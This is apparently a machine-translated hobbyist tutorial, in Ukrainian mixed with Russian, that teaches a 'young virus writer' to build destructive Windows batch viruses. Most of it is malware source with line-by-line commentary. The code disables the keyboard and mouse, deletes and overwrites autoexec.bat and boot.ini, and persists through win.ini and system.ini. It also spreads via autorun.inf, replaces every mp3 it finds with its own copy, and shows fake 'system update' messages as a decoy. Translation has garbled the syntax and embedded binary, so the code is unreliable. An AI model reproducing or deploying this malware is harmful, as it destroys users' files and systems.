BAT-вірус своїми руками

Привет тобі знову, юний вірусописатиль. Якщо ти читав Минулої мою статтю під назвою "Учимо ДОС", то нічого складного тут для тебе не буде. А якщо не читав, то уважно дивись коментарі. Отже, почнемо. Сиджу я одного разу і думаю: а чи не накатать мені вірус? А так як крім QБарсіка я нічого не знав, а ДОС був моїм другим ... [Братом], а ти що подумав ізвращенец? :) ~. ТО я вирішив писати вірус на ньому, і виявилося, це не так важко.

Ось тіло мого першого вірусу

"@ echo off
rundll32 keyboard, Disable
rundll32 mouse, Disable
Copy% 0% Windir% / System
echo run =% Windir% / System / *. Bat>> win.ini
echo run =% Windir% / System / *. Bat>> SYSTEM.INI
label LOHOLAMMER
if exist c: autoexec.bat attrib c: Autoexec.bat-H-S-A-R
deltree / y c: Autoexec.bat> nul
echo autoexec.bat echo YOU ARE LAMMER ... XE-XE-XE> C: Autoexec.bat
rundll32 mouse, Enable
rundll32 keyboard, Enable
echo var WSHShell = WScript.CreateObject ( "WScript.Shell");>% Temp% mes.js
echo WSHShell.Popup ( "Warning, .. Ваш комп'ютер заражений вірусом, а позбутися від нього не можна, хе-хе-хе");>>% Temp% mes.js
Start% Temp% mes.js
deltree / Y% Temp% mes.js
attrib c: Autoexec.bat + H + S + A + R
Pause
CLS

Пояснюю популярно і крок за кроком:

1 @ echo off - забороняється ДОСовскому віконця показувати, що робить скрипт.
2 rundll32 keyboard, Disable - Отключать Клаву, на випадок якщо юзер зрозуміє що відбувається і надумав натиснути CTRL + C
3 rundll32 mouse, Disable - Отключать миша теж на всякий.
4 Copy% 0% Windir% / System - копіюємо в папку Windows / System
/ /% 0 - Змінна, яка вказує на оригінальний файл-вірус
/ /% Windir% - мінлива папка масдая.
5 echo run =% Windir% / System / *. Bat>>% Windir% win.ini - Додає текст "Run =% Windir% / System / *. Bat" у файл win.ini
6 echo run =% Windir% / System / *. Bat>>% Windir% SYSTEM.INI - Додає текст "Run =% Windir% / System / *. Bat" у файл SYSTEM.INI
7 label LOHOLAMMER - Меняет ім'я диску C: на "LOHOLAMMER"
8 if exist c: autoexec.bat attrib c: Autoexec.bat-H-S-A-R - Перевіряємо якщо є файл C: Autoexec.bat то прибираємо
/ / у нього атрибути-H-S-A-R
9 deltree / yc: Autoexec.bat - видаляти файли C: Autoexec.bat, якщо не прибрати атрибути, то програма не знищить файл.
10 echo autoexec.bat echo YOU ARE LAMMER ... XE-XE-XE> C: Autoexec.bat - Додати текст "YOU ARE LAMMER ... XE-XE-XE"
/ / у новий файл Autoexec.bat
11 rundll32 mouse, Enable - включає, нехай думає, що ниче не було.
12 rundll32 keyboard, Enable - включає, нехай думає, що ниче не було.
13 echo var WSHShell = WScript.CreateObject ( "WScript.Shell");>% Temp% mes.js
echo WSHShell.Popup ( "Warning, .. Ваш комп'ютер заражений вірусом, а позбутися від нього не можна, хе-хе-хе");>>% Temp% mes.js
Start% Temp% mes.js. / / Цей текст виводить масдайное вікно з написом
deltree / Y% Temp% mes.js / / А потім стирає за собою сліди.
14 attrib c: Autoexec.bat + H + S + A + R - Робить файл C: Autoexec.bat прихованим і системний чтоб ламер нічого не запідозрив.
15 Pause - Просимо натиснути будь-яку клавішу (Не обов'язково натискати адже вірь вже зробив свою справу.)
16 CLS - Виходить

Ця програма, при наступному перезавантаженні не дасть завантажитися виндовс і буде писати 'Ви ламер.'. Працює тільки в винде до 2000.

Йдемо далі, пишемо новий вірус. Ті функції, які були згадані вже, не будуть пояснюватися заново. Це просто удосконалена версія минулого вірусу.

@ echo off
rundll32 user, setcursorpos / / прибирати з екрану курсор в лівий кут
rundll32 keyboard, Disable / / Було
rundll32 mouse, Disable / / Було
rundll32 user, swapmousebutton. / / Тут ми переставляє кнопки миші
Echo Оновлення параметрів системи, будь-ласка зачекайте ... / / пише відмазки:)
label mp_k / / Міняємо ім'я диску
copy mp_k.exe% Windir% / / копіює себе в папку Windows
if exist c: autoexec.bat attrib c: Autoexec.bat-H-S-A-R
deltree / y c: Autoexec.bat
if exist c: io.sys echo autoexec.bat echo YOU_ARE_LAMMER ... .[]=[_ H @ CKED_BY_ [Kas] * _ "SmallPox_Vir_Org" _]> C: Autoexec.bat
echo run =% Windir% mp_k.exe>>% Windir% win.ini

echo run =% Windir% mp_k.exe>>% Windir% SYSTEM.INI
Echo [AutoRun]> C: autorun.inf / / Ці операції є в минулому вірус.
echo open = C: Autoexec.bat> C: autorun.inf
Echo [AutoRun]> D: autorun.inf
echo open = C: Autoexec.bat> D: autorun.inf
rundll32 mouse, Enable
rundll32 keyboard, Enable
echo var WSHShell = WScript.CreateObject ( "WScript.Shell");>% Temp% mes.js
echo WSHShell.Popup ( "Warning, .. А тепер необхідно перезавантажити");>>% Temp% mes.js
Start% Temp% mes.js
deltree / Y% Temp% mes.js
attrib c: Autoexec.bat + H + S + A + R
attrib% Windir% mp_k.exe + H + S + A + R
attrib c: autorun.inf + H + S + A + R
attrib d: autorun.inf + H + S + A + R
deltree / y mp_k.exe
rmdir% Windir% Temp / / видаляти папку Temp
mkdir% Windir% Temp / / Створюємо папку Temp
CLS

А тепер, что-то новое.

@ echo off
CLS
echo Please wait, updating system ...
ctty nul. / / Це нова команда, вона відключає висновок тексту у віконці.
EXIST% WINDIR% SYSTEMVMM32% 0 GOTO: End / / Якщо вірь вже запускався то нехай запустить себе знову.
Copy% 0% WINDIR% SYSTEMVMM32
cd c: / / Переходимо в іншу директорію
For%% a in (*. mp3 c: *. mp3 c: MUZ *. mp3 c: My Music *. mp3 ..*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
cd My Music
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
cd My_Music
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
cd MyMusic
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
cd Music
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
CD Музика
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
CD Музон
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
cd MUZ
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
cd mp3
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / замінюються у цій папці всі файли mp3 своїм текстом
cd d:
For%% a in (*. mp3 c: *. mp3 c: MUZ *. mp3 c: My Music *. mp3 ..*. mp3) do copy / Y% 0%% A
cd My Music
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A / / Тут теж саме.
cd My_Music
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A
cd MyMusic
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A
cd Music
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A
CD Музика
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A
CD Музон
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A
cd MUZ
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A
cd mp3
For%% a in (*. mp3 ..*. mp3 ..*. mp3 .*. mp3 .*. mp3) do copy / Y% 0%% A
: End / / Мітка
Start / M / W% WINDIR% SYSTEMVMM32% 0 / / Запуск у згорнутому режимі
ctty con / / Врубаем дозвіл на показ тексту у вікні
echo Say goodbye your MP3 collection:)) Virus [BAT.kas.a] / / Прощальні рядка
CLS / / Вихід.

Тут мало нового але вже щось. Йдемо далі. Накачал я с инета BAT-вірусів і почав їх досліджувати. І ось результати:
Написав ще пару своїх:

ctty nul / / Було таке
REM Чй † Ђь @ uoњPSQRVW?
<ТЌ
"Q_ь № у | U =
є № є њъ.я? ђ л, ђ / / /
Copy% 0 *. EXE / / /
Copy% 0 b.com> nul / / Ця технологія взята з вірусу другова.
b.com. / / Ці каракуля перехоплюють робочі в даний момент файли, і херіт їх.
del b.com. / / / Це текст АСМ скомпіленого в EXE
Rem _ ^ ZY [Xќњъ.я? ђ К ђђђђъ.я.ђ К ћ # @ echoђе.5Н.Њ '‰? ђ Ќ е.% Н.Ќ є Н'ђђ / /
@ echo off / /
echo XEP_BAM / / Пишемо злобно і красиво.
if exist% Windir% /% 0.bat goto: End / / Перевірка віря на запусканіе, те чи був він запущений.
@ rundll32 user, setcursorpos
ctty con / / Було таке
Echo Оновлення параметрів системи, будь-ласка зачекайте ... / / Відволікати.
@ label BAT.c
Copy% 0.bat% Windir%> nul
if exist c: autoexec.bat attrib c: Autoexec.bat-H-S-A-R
if exist c: boot.ini attrib c: boot.ini-H-S-A-R
deltree / y c: Autoexec.bat
deltree / y c: boot.ini
if exist c: autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER .... > C: Autoexec.bat
if exist c: boot.ini echo autoexec.bat echo YOU_ARE_LAMMER .... > C: boot.ini / / Це для XP він там замість Autoexec.bat;)
deltree / Y% Windir% / win.ini

Copy% 0>% Windir% / win.ini
deltree / Y% Windir% / SYSTEM.INI
Copy% 0>% Windir% / SYSTEM.INI
if exist c: io.sys / / Перевірка наявності диска так як на кожному диску є файл io.sys
Echo [AutoRun]> C: autorun.inf / / І якщо він є заразити його.
echo open = C: Autoexec.bat>> C: autorun.inf / / І якщо він є заразити його.
if exist d: io.sys / / Перевірка наявності диска
Echo [AutoRun]> D: autorun.inf / / І якщо він є заразити його.
echo open = C: Autoexec.bat>> D: autorun.inf / / І якщо він є заразити його.
if exist e: io.sys / / Перевірка наявності диска
Echo [AutoRun]> E: autorun.inf / / І якщо він є заразити його.
echo open = C: Autoexec.bat>> E: autorun.inf / / І якщо він є заразити його.
: End / / Мітка РМ початок.
CLS / / Вихід"